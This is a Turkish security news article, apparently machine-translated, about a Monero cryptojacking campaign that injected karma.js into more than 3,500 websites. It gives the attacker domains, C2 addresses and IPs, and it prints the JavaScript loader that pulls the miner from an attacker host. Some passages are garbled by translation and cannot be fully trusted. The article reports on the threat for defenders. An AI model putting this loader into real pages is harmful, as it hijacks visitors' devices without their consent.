Yeni kripto-hiJacking dalgası 3.500’den fazla web sitesine bulaştı


Yeni kripto-hiJacking dalgası 3.500'den fazla web sitesine bulaştı

Gizli bir Monero madenciliği kampanyası, karma.js adlı zararsız görünümlü bir JavaScript dosyasını yerleştirerek 3.500’den fazla web sitesini sessizce tehlikeye attı.

Operasyon, kaynak kullanımını kullanıcı şüphesini önlemek için yeterince düşük tutarken, WebAssembly, web çalışanları ve websockets’i Sifhon CPU döngülerine kullanır.

CISTE.DEV analistleri ilk olarak rutin tarayıcıların yobox.store adresine yönlendirilen trustisimportant.fun aracılığıyla teslim edilen bir komut dosyasını işaretledikten sonra anomaliyi not ettiler.

Google Haberleri

Ekip, ilk ağ çağrısı veya CPU ani artışları gözlemlemedi, ancak sezgisel analiz yükü kötü niyetli olarak sınıflandırdı ve daha derin bir yıkım gerektirdi.

Kodun ambalajından çıkarılması, WSS: //lokilokitwo.de: 10006’da bir komut ve kontrol kanalı ortaya çıkardı, 89.58.14.251 ve 104.21.80.1 ve geri dönüşüm altyapısı için bir penchant, daha önce Magecart kart kesimine bağlı olarak bağlandı.

Madenci, karma yoğunluğunu kısarak ve arka plan iş parçacıklarına dağıtılarak, mobil cihazlarda bile görünür bir ayak izini korur.

Bu, Coinhive’ın 2019 ölümünden sonra bir zamanlar yok olan tarayıcı tabanlı kriptajlamanın yeniden canlanmasını işaret ediyor, ancak şimdi hem reklam-bloker kara listelerden hem de yerleşik tarayıcı madenciliği savunmalarından kaçmak için rafine edildi.

Saçma sapan nosaj = daha hızlı.mo sorgusu (kaynak – cside.dev)

Mağdurlar sadece marjinal gecikme yaşarlar, saldırganlar için bekleme süresini ve kümülatif karı uzatırlar. Bu, zinciri başlatan Base64 kodlu yükleyiciyi gösterir.

Gizli enfeksiyon mekanizması

Enfeksiyon, genellikle tehlikeye atılan üçüncü taraf widget’ları veya eski CMS eklentileri ile meşru bir sayfaya enjekte edilen tek satırlı bir veri URI ile başlar.

Yürütüldükten sonra, saplama gerçek madenciyi dinamik olarak yükler, çoğaltma kontrollerini önlemek için rastgele bir öğe kimliği atar ve EverythInLife () Bootstrap rutinini başlatan bir onload işleyicisini bağlar.

(function(d,s,id){
  if(d.getElementById(id)) return;
  const js=d.createElement(s);js.id=id;
  js.src="https://trustisimportant.fun/karma/karma.js?karma=bs";
  d.getElementsByTagName(s)[0].parentNode.insertBefore(js, s);
})(document,'script','backup-jss');

Karma.js içinde, bir yetenek probu navigatörü test eder.

CPU yükünün yaklaşık% 20 ile sınırlandırılması, çalışma zamanı komut dosyası entegre savunmaları talep ederek anormallikleri gizler.

Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.



Source link